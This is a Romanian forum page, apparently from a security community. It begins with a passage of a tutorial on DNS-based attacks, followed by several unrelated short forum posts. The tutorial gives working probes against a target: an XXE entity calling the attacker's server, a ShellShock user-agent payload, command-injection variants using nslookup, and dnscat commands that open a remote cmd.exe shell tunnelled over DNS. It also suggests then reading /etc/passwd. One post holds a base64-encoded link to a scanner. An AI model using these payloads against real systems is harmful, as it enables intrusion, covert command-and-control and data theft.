SQL daca nu stii cum a fost scris . XML External Entity ( XXE ) Putem verifica daca un sistem este vulnerabil XXE introducand in internul fisierului sau a query XML, un cod ca cel ce urmeaza : ]<!ENTITY xxe SYSTEM "http://notexistingname.ourserver.org" >]> <user>&xxe;</user> Daca vom primii pe serverul nostru un request de rezolutie DNS pentru " notexistingname ", vom stii ca sistemul este vulnerabil actiunilor externe . In acest punct ajunsi putem sa incepem sa adunam fisiere locale, cum ar fii /etc/passwd . ShellShock Una dintre metodele de invazie pentru a verifica prezenta unui bug Bash ( ShellShock ), este folosirea rezolutiei DNS cu ajutorul nslookup, comanda recunoscuta pe Windows, Linux si Mac . Se poate imposta un user-agent si sa asteptam ca vin request-urile . () { test;};nslookup shellshocked.ourserver.org Daca vom primii pe serverul nostru un request de rezolutie DNS pentru " shellshocked ", vom sti ca aplicatia web foloseste un script cu o versiune vulnerabila de Bash . Putem deci sa executam orice alta comanda in locul simplei nslookup . Remote command execution ( RCE ) Ca in exemplul de Shellshock putem executa nslookup, pentru a verifica vulnerabilitatile de tip RCE, pentru a face asta sunt o gama larga de trucuri ca in exemplu : ;nslookup shell.ourserver.org `nslookup shell.ourserver.org` |nslookup shell.ourserver.org $(nslookup shell.ourserver.org) Ca in exemplele precedente, cand vom primi un request de rezolutie pentru " shell ", va insemna ca am verificat vulnerabilitatea si putem incepe atacul . DNS : Atac post-verificare Noi metode de atac folosind DNS-uri, post-verificare Dupa ce am verificat ca unul dintre atacurile precendent a functionat, putem in continuare sa folosim serviciul DNS pentru a mentine un profil low fara a face prea mult " zgomot " pe reteaua tintei noastre . Vom aveam nevoie de un tool numit dnscat, prezent in internul nbtool, poate fii obtinul prin GitHub . dnscat --listen -p 53 Comanda precedenta : " -listen ", deschide dnscat in modul server ( ascultare ) " -p ", identifica port-ul pe care va face " listening " . 53 fiind default, acela al serviciului DNS Acum putem sa deschidem pe masina tintei, dnscat ca si client, care va reintoarce ca shell de comenzi de windows ( cmd.exe ) . dnscat --dns virtualmachine1 -e cmd.exe Aici : " -dns ", identifica IP-ul sau hostname-ul masinii pe care este pornit dnscat in modalitatea server. " -exec ", porneste promp-ul de comnezi windows Iar acesta in schimb este vizualul serverului . Tot ce este scris si citit de dnscat, trece prin queryDNS, asa cum putem vedea explorand cu Wireshark : Concluzii Am vazut cum sa folosim si sa abuzam de un serviciu care a existat mereu inca din primi ani '80 si pe care tot internetul se bazeaza . Tutorialul ne arata cum este posibil sa obtinem informatii facand query-uri de tip DNS si expoatarea unui canal de comunicare greu filtrat . Multe metode de recunoastere si atac prezente in acet tutorial sunt ramificate din prezentarea lui Ron Bowse . Videoul urmator, este o demonstratie de atac XSS majoritatii site-urilor Whols . Sursa
  19. Caut programator pentru adaugare cateva functii la un shop online. Mai multe detalii PM. Plata in BTC 50% avans pentru membrii cu reputatie. Restul banii dupa livrare. Contact jabber + otr lasati adresa in PM ms.
  20. Care sistem este mai cautat android sau ios? Ce cunostinte necesita pentru a crea o aplicatie pentru Android? Ce cunostinte necesita pentru a crea o aplicatie pentru IOS?
  21. Ofer cod de inregistrare pentru https://www.elearnsecurity.com/course/penetration_testing_student/ Cine-l doreste sa imi lase PM.
  22. Va rog frumos, daca stie cineva, sa imi spuna unde pot gasi bag of words pentru fitrarea tweets. Am nevoie pentru un proiect. Ma intereseaza cuvinte care pot ajuta la filtrare pentru gasirea oamenilor care posteaza pe twitter mesaje raciste sau care incita la revolta. Am cautat pe diferite siteuri, teze de doctorat si nu am gasit asa ceva. Va multumesc mult!
  23. aHR0cDovL3JzdC5ob3N0NTYuY29tL3NjYW5uZXIv Distractie placuta
  24. Este destul de simplu sa castigati jocuri pentru steam si desura,asa ca voi incerca sa va explic in doar cativa pasi: 1.Intra refff sau fara refff 2.Dai sign in with steam. 3.Va conectati la un vpn de SUA 4.Intrati Earn your Steam games for free on Steamgameswap - sGs 5. Strangeti puncte Jocurile pentru desura sunt foarte ieftine(maxim 50 puncte),iar cele de steam sunt putin mai scumpe. Puncte puteti castiga si realizand ACHIEVEMENTS de la profil. Daca aveti intrebari,sunt la dispozitia voastra.
×
×
  • Create New...